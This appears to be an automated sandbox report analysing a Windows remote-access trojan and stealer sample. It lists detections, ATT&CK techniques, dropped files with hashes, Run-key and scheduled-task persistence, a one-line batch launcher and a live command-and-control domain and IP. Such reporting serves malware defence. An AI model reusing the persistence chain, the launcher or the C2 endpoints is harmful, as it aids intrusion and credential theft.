                          Source: Yara matchFile source: C:\Recovery\Memory Compression.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Recovery\NOFqHeDosUIopsPGLT.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Chaindriver.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Default\Pictures\RuntimeBroker.exe, type: DROPPED
                          Yara detected zgRAT
                          Source: Yara matchFile source: 8.0.Chaindriver.exe.660000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Recovery\Memory Compression.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Recovery\NOFqHeDosUIopsPGLT.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Chaindriver.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Default\Pictures\RuntimeBroker.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		Valid Accounts11
                          Windows Management Instrumentation                          		1
                          Scripting                          		1
                          Exploitation for Privilege Escalation                          		1
                          Disable or Modify Tools                          		OS Credential Dumping2
                          System Time Discovery                          		1
                          Taint Shared Content                          		1
                          Archive Collected Data                          		2
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Deobfuscate/Decode Files or Information                          		LSASS Memory3
                          File and Directory Discovery                          		Remote Desktop ProtocolData from Removable Media1
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts1
                          Scheduled Task/Job                          		1
                          Scheduled Task/Job                          		11
                          Process Injection                          		3
                          Obfuscated Files or Information                          		Security Account Manager37
                          System Information Discovery                          		SMB/Windows Admin SharesData from Network Shared Drive3
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCron21
                          Registry Run Keys / Startup Folder                          		1
                          Scheduled Task/Job                          		3
                          Software Packing                          		NTDS121
                          Security Software Discovery                          		Distributed Component Object ModelInput Capture13
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                          Registry Run Keys / Startup Folder                          		1
                          DLL Side-Loading                          		LSA Secrets1
                          Process Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          File Deletion                          		Cached Domain Credentials31
                          Virtualization/Sandbox Evasion                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                          Masquerading                          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                          Virtualization/Sandbox Evasion                          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                          Process Injection                          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583176 Sample: t8F7Ic986c.exe Startdate: 02/01/2025 Architecture: WINDOWS Score: 100 107 797441cm.n9shteam2.top 2->107 111 Suricata IDS alerts for network traffic 2->111 113 Found malware configuration 2->113 115 Antivirus detection for URL or domain 2->115 117 15 other signatures 2->117 14 t8F7Ic986c.exe 13 2->14         started        18 Memory Compression.exe 2->18         started        21 NOFqHeDosUIopsPGLT.exe 2->21         started        23 5 other processes 2->23 signatures3 process4 dnsIp5 91 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 14->91 dropped 93 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 14->93 dropped 95 C:\Users\user\AppData\Local\...\python39.dll, PE32+ 14->95 dropped 103 8 other malicious files 14->103 dropped 135 Found pyInstaller with non standard icon 14->135 25 t8F7Ic986c.exe 14->25         started        109 797441cm.n9shteam2.top 185.158.202.52, 49730, 49737, 49738 PREVIDER-ASNL Netherlands 18->109 97 C:\Users\user\Desktop\TkRgFrOc.log, PE32 18->97 dropped 99 C:\Users\user\Desktop\KGIrVxyv.log, PE32 18->99 dropped 101 C:\Users\user\Desktop\FnBzuKhI.log, PE32 18->101 dropped 105 2 other malicious files 18->105 dropped 27 cmd.exe 18->27         started        137 Multi AV Scanner detection for dropped file 21->137 file6 signatures7 process8 process9 29 cmd.exe 1 25->29         started        31 conhost.exe 27->31         started        33 chcp.com 27->33         started        35 w32tm.exe 27->35         started        process10 37 BoosterX.exe 4 29->37         started        41 conhost.exe 29->41         started        file11 85 C:\Chaindriver.sfx.exe, PE32+ 37->85 dropped 127 Antivirus detection for dropped file 37->127 129 Multi AV Scanner detection for dropped file 37->129 43 cmd.exe 1 37->43         started        signatures12 process13 process14 45 Chaindriver.sfx.exe 3 43->45         started        49 conhost.exe 43->49         started        file15 89 C:\Chaindriver.exe, PE32 45->89 dropped 133 Multi AV Scanner detection for dropped file 45->133 51 Chaindriver.exe 11 25 45->51         started        signatures16 process17 file18 77 C:\Users\user\Desktop\viEjRGTv.log, PE32 51->77 dropped 79 C:\Users\user\Desktop\Zfmnrnxn.log, PE32 51->79 dropped 81 C:\Users\user\Desktop\PxTXHLsG.log, PE32 51->81 dropped 83 7 other malicious files 51->83 dropped 119 Antivirus detection for dropped file 51->119 121 Multi AV Scanner detection for dropped file 51->121 123 Creates an undocumented autostart registry key 51->123 125 4 other signatures 51->125 55 csc.exe 4 51->55         started        59 cmd.exe 51->59         started        61 schtasks.exe 51->61         started        63 17 other processes 51->63 signatures19 process20 file21 87 C:\Windows\...\SecurityHealthSystray.exe, PE32 55->87 dropped 131 Infects executable files (exe, dll, sys, html) 55->131 65 conhost.exe 55->65         started        67 cvtres.exe 1 55->67         started        69 conhost.exe 59->69         started        71 chcp.com 59->71         started        73 w32tm.exe 59->73         started        75 Chaindriver.exe 59->75         started        signatures22 process23

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          t8F7Ic986c.exe47%ReversingLabsByteCode-MSIL.Trojan.Generic
                          t8F7Ic986c.exe61%VirustotalBrowse
                          t8F7Ic986c.exe100%AviraTR/Drop.Agent.uteef

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Recovery\NOFqHeDosUIopsPGLT.exe100%AviraHEUR/AGEN.1323342
                          C:\Recovery\Memory Compression.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\AppData\Local\Temp\lrFP7pOB0Z.bat100%AviraBAT/Delbat.C
                          C:\Users\user\Desktop\KGIrVxyv.log100%AviraTR/AVI.Agent.updqb
                          C:\Users\user\Desktop\TkRgFrOc.log100%AviraTR/PSW.Agent.qngqt
                          C:\Chaindriver.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\Default\Pictures\RuntimeBroker.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat100%AviraBAT/Delbat.C
                          C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe100%AviraTR/AVI.Agent.denui
                          C:\Recovery\NOFqHeDosUIopsPGLT.exe100%AviraHEUR/AGEN.1323342
                          C:\Users\user\Desktop\PxTXHLsG.log100%AviraTR/AVI.Agent.updqb
                          C:\Recovery\NOFqHeDosUIopsPGLT.exe100%Joe Sandbox ML
                          C:\Recovery\Memory Compression.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\HTKiXRcY.log100%Joe Sandbox ML
                          C:\Users\user\Desktop\BXpblVtN.log100%Joe Sandbox ML
                          C:\Users\user\Desktop\TkRgFrOc.log100%Joe Sandbox ML
                          C:\Chaindriver.exe100%Joe Sandbox ML
                          C:\Users\Default\Pictures\RuntimeBroker.exe100%Joe Sandbox ML
                          C:\Recovery\NOFqHeDosUIopsPGLT.exe100%Joe Sandbox ML
                          C:\Chaindriver.exe70%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Chaindriver.sfx.exe18%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Recovery\Memory Compression.exe70%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Recovery\NOFqHeDosUIopsPGLT.exe70%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\Default\Pictures\RuntimeBroker.exe70%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe70%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe57%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\AppData\Local\Temp\_MEI75042\VCRUNTIME140.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI75042\_bz2.pyd0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI75042\_decimal.pyd0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI75042\_hashlib.pyd0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI75042\_lzma.pyd0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI75042\_socket.pyd0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI75042\libcrypto-1_1.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI75042\python39.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI75042\select.pyd0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\_MEI75042\unicodedata.pyd0%ReversingLabs
                          C:\Users\user\Desktop\BXpblVtN.log8%ReversingLabs
                          C:\Users\user\Desktop\FnBzuKhI.log25%ReversingLabs
                          C:\Users\user\Desktop\HTKiXRcY.log8%ReversingLabs
                          C:\Users\user\Desktop\KGIrVxyv.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\PxTXHLsG.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\TkRgFrOc.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\Zfmnrnxn.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\viEjRGTv.log25%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://crl4.digiceN$Qw30%Avira URL Cloudsafe
                          http://crl3.digiN$Qw30%Avira URL Cloudsafe
                          http://797441cm.n9shteam2.top100%Avira URL Cloudmalware
                          http://797441cm.n9shteam2.top/Videouploads.php100%Avira URL Cloudmalware
                          http://crl3.digiN$Qw0%Avira URL Cloudsafe
                          http://797441cm.n9shteam2.top/100%Avira URL Cloudmalware
                          http://crl4.digice0%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          797441cm.n9shteam2.top
                          		185.158.202.52
                          		truetrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://797441cm.n9shteam2.top/Videouploads.phptrue
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688t8F7Ic986c.exe, 00000001.00000003.1664116747.0000023EBC700000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000002.1666242087.0000023EBDF00000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://python.org/dev/peps/pep-0263/t8F7Ic986c.exe, 00000001.00000002.1667701805.00007FFDFB989000.00000002.00000001.01000000.00000004.sdmpfalse
                                		high
                                http://crl3.digiN$Qwt8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl3.digiN$Qw3t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://797441cm.n9shteam2.topMemory Compression.exe, 00000025.00000002.1821172623.0000000002F5D000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000025.00000002.1821172623.0000000002D8C000.00000004.00000800.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readert8F7Ic986c.exe, 00000001.00000003.1664116747.0000023EBC700000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000002.1665781347.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000003.1664352524.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.openssl.org/Hlibcrypto-1_1.dll.0.drfalse
                                    		high
                                    http://797441cm.n9shteam2.top/Memory Compression.exe, 00000025.00000002.1821172623.0000000002D8C000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://crl4.digicet8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.python.org/dev/peps/pep-0205/t8F7Ic986c.exe, 00000000.00000003.1656647593.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                      		high
                                      https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#t8F7Ic986c.exe, 00000001.00000003.1664116747.0000023EBC700000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000002.1665781347.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000003.1664352524.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://crl4.digiceN$Qw3t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pyt8F7Ic986c.exe, 00000001.00000003.1664352524.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://crl3.digit8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameChaindriver.exe, 00000008.00000002.1728153566.000000000376F000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000025.00000002.1821172623.0000000002D8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.python.org/download/releases/2.3/mro/.base_library.zip.0.drfalse
                                                		high
                                                https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syt8F7Ic986c.exe, 00000001.00000003.1664116747.0000023EBC700000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000002.1665781347.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000003.1664352524.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  185.158.202.52
                                                  		797441cm.n9shteam2.topNetherlands
                                                  		20847PREVIDER-ASNLtrue

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1583176
                                                  Start date and time:2025-01-02 07:41:07 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 9m 46s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:62
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:t8F7Ic986c.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:a4923d4db3234b3905ad3097cc03af46.exe
                                                  Detection:MAL
                                                  Classification:mal100.spre.troj.expl.evad.winEXE@63/47@1/1
                                                  EGA Information:
                                                  • Successful, ratio: 61.5%
                                                  HCA Information:
                                                  • Successful, ratio: 58%
                                                  • Number of executed functions: 133
                                                  • Number of non-executed functions: 173
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): Conhost.exe, RuntimeBroker.exe, SIHClient.exe
                                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target Chaindriver.exe, PID 2336 because it is empty
                                                  • Execution Graph export aborted for target Chaindriver.exe, PID 7712 because it is empty
                                                  • Execution Graph export aborted for target Memory Compression.exe, PID 6924 because it is empty
                                                  • Execution Graph export aborted for target NOFqHeDosUIopsPGLT.exe, PID 7976 because it is empty
                                                  • Execution Graph export aborted for target t8F7Ic986c.exe, PID 7520 because there are no executed function
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  01:42:12API Interceptor1x Sleep call for process: Memory Compression.exe modified
                                                  06:42:04Task SchedulerRun new task: Chaindriver path: "C:\Chaindriver.exe"
                                                  06:42:04Task SchedulerRun new task: ChaindriverC path: "C:\Chaindriver.exe"
                                                  06:42:04Task SchedulerRun new task: Memory Compression path: "C:\Recovery\Memory Compression.exe"
                                                  06:42:04Task SchedulerRun new task: Memory CompressionM path: "C:\Recovery\Memory Compression.exe"
                                                  06:42:05Task SchedulerRun new task: NOFqHeDosUIopsPGLT path: "C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe"
                                                  06:42:05Task SchedulerRun new task: NOFqHeDosUIopsPGLTN path: "C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe"
                                                  06:42:05Task SchedulerRun new task: RuntimeBroker path: "C:\Users\Default\Pictures\RuntimeBroker.exe"
                                                  06:42:05Task SchedulerRun new task: RuntimeBrokerR path: "C:\Users\Default\Pictures\RuntimeBroker.exe"
                                                  06:42:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NOFqHeDosUIopsPGLT "C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe"
                                                  06:42:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Default\Pictures\RuntimeBroker.exe"
                                                  06:42:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Memory Compression "C:\Recovery\Memory Compression.exe"
                                                  06:42:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chaindriver "C:\Chaindriver.exe"
                                                  06:42:38AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NOFqHeDosUIopsPGLT "C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe"
                                                  06:42:46AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Default\Pictures\RuntimeBroker.exe"
                                                  06:42:54AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Memory Compression "C:\Recovery\Memory Compression.exe"
                                                  06:43:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chaindriver "C:\Chaindriver.exe"
                                                  06:43:10AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run NOFqHeDosUIopsPGLT "C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe"
                                                  06:43:18AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Users\Default\Pictures\RuntimeBroker.exe"
                                                  06:43:26AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Memory Compression "C:\Recovery\Memory Compression.exe"
                                                  06:43:34AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Chaindriver "C:\Chaindriver.exe"
                                                  06:43:51AutostartRun: WinLogon Shell "C:\Recovery\NOFqHeDosUIopsPGLT.exe"
                                                  06:44:00AutostartRun: WinLogon Shell "C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe"

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  185.158.202.52QH67JSdZWl.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  • 487997cm.renyash.top/VideoFlowergeneratorTestpublic.php

                                                  Domains

                                                  No context

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  PREVIDER-ASNLQH67JSdZWl.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  • 185.158.202.52
                                                  kWZnXz2Fw7.elfGet hashmaliciousMiraiBrowse
                                                  • 84.241.133.1
                                                  aQvU3QHA3N.elfGet hashmaliciousUnknownBrowse
                                                  • 62.165.97.41
                                                  loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                  • 84.241.184.118
                                                  http://maritimecybersecurity.nlGet hashmaliciousUnknownBrowse
                                                  • 31.7.2.29
                                                  21y8z80div.elfGet hashmaliciousMiraiBrowse
                                                  • 80.65.103.15
                                                  botx.arm7.elfGet hashmaliciousMiraiBrowse
                                                  • 84.241.184.103
                                                  BLBq6xYqWy.elfGet hashmaliciousMiraiBrowse
                                                  • 80.65.126.250
                                                  https://expressinvoice.mijnparagon-cc.nl/Get hashmaliciousUnknownBrowse
                                                  • 84.241.158.7
                                                  https://expressinvoice.mijnparagon-cc.nl/Get hashmaliciousUnknownBrowse
                                                  • 84.241.158.7

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\1.bat

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):45
                                                  Entropy (8bit):4.552638373963222
                                                  Encrypted:false
                                                  SSDEEP:3:mKDDj6lOTzFIVUGR:hcEyVUGR
                                                  MD5:ACEF7B500D9FC3EA5E912ECF10781EAA
                                                  SHA1:844D68AA82584B89B15EF3F82BD04D70FB0EB856
                                                  SHA-256:DED8283434BD7C870ABD09FC6359A143B289BD62B3956F9D1D2AC14BFF143B08
                                                  SHA-512:59ECC8F889A0299987114377FBEA6096E419316CCBA80C2B1EAFE5D6D4E469933EA45DBA8E4939161F5707D267BFD4530BE70B143BCFBB735E7503F53DC4CDC7
                                                  Malicious:false
                                                  Preview:@echo off....start Chaindriver.sfx.exe -p1234

                                                  C:\6fc2a4b0c3d029

                                                  Download File
                                                  Process:C:\Chaindriver.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):99
                                                  Entropy (8bit):5.515177200647307
                                                  Encrypted:false
                                                  SSDEEP:3:LOPQDdHbOWIdXMSUtVyGibnfXz/fyzTjiLMkn:LOedHbOPdcSUvyGMPz/fyzpk
                                                  MD5:CDE9403651488E5763E0BAE6C178F8F4
                                                  SHA1:ED2753F79D5F8A87ED2E75A29CD37CD75BB445AF
                                                  SHA-256:524F853C5C7A321238A796843CBBD008C8C45531229987AEDB0FB375CDF0F189
                                                  SHA-512:259CC01AD7096A41B5D8B4046E01430D80F53F763AB7E0F17EA6686F412A93918326AA1C6E7EE7BE5565860D835CE4ACBD000211D4E5F8813BB89BF2AB5328D3
                                                  Malicious:false
                                                  Preview:zmj5nHrhkxjuf8r49tYuoVaYA3m82i7muBQRlBHoY6P93WyxCzUnCObeLK5uesoBz7AesaT7ltWrFbfnFz5COUjgjwGaGXKpSNJ

                                                  C:\Chaindriver.exe

                                                  Download File
                                                  Process:C:\Chaindriver.sfx.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:modified
                                                  Size (bytes):1917952
                                                  Entropy (8bit):7.53781423596998
                                                  Encrypted:false
                                                  SSDEEP:49152:R89kht8D3OiDl99jDZHVk+hBTw/uJNARR:RxhtxiRD/4+/Tw2JNAR
                                                  MD5:64F81209BCCE8D36D800FEEC26D75990
                                                  SHA1:B3E2F1B661ABC94D38B3BB471C7E0B75A1660D0F
                                                  SHA-256:B727092B2C5BCEAA3E910EEDFCEC738810BD531DA5EB58FBB11D253CA48D1FE2
                                                  SHA-512:2C5454A679D81A6F4C6CCFBC17D8DA2E06A517BFCF12DFCC8AFAD7F1041D98998446E81292E5D2CC1527DC4D334451E9F97BE366F0A8D2348B7AFC9CE9C828FA
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Chaindriver.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Chaindriver.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 70%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x.Zf.................<...........[... ...`....@.. ....................................@..................................[..K....`.. ............................................................................ ............... ..H............text....;... ...<.................. ..`.rsrc... ....`.......>..............@....reloc...............B..............@..B.................[......H.......................<....z...[.......................................0..........(.... ........8........E....).......M...`...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ........8....*....0.......... ........8........E............l.......`...8.......... ....8....~....(O... .... .... ....s....~....(S....... ....~....{....:....& ....8....r...ps....z*....~....(W...~....([... ....?.... ........8G...~....:.... ....~....{b...:-...& ....8"...

                                                  C:\Chaindriver.sfx.exe

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:modified
                                                  Size (bytes):1903066
                                                  Entropy (8bit):7.843059223598419
                                                  Encrypted:false
                                                  SSDEEP:49152:wZB1G8YNMJPPbLWw/tUVjbny/3tPEKOQ0Kzy:+3G/MJLLWoAq/d7Ty
                                                  MD5:9E935AF26F27628601A2A336CA24AEF2
                                                  SHA1:73BD448A3F95D4A336041318ED3F73726969A4F5
                                                  SHA-256:53C231889339553E8AE274D538AB6EE9BCB471D63B1814FB1078FA475DBE82A2
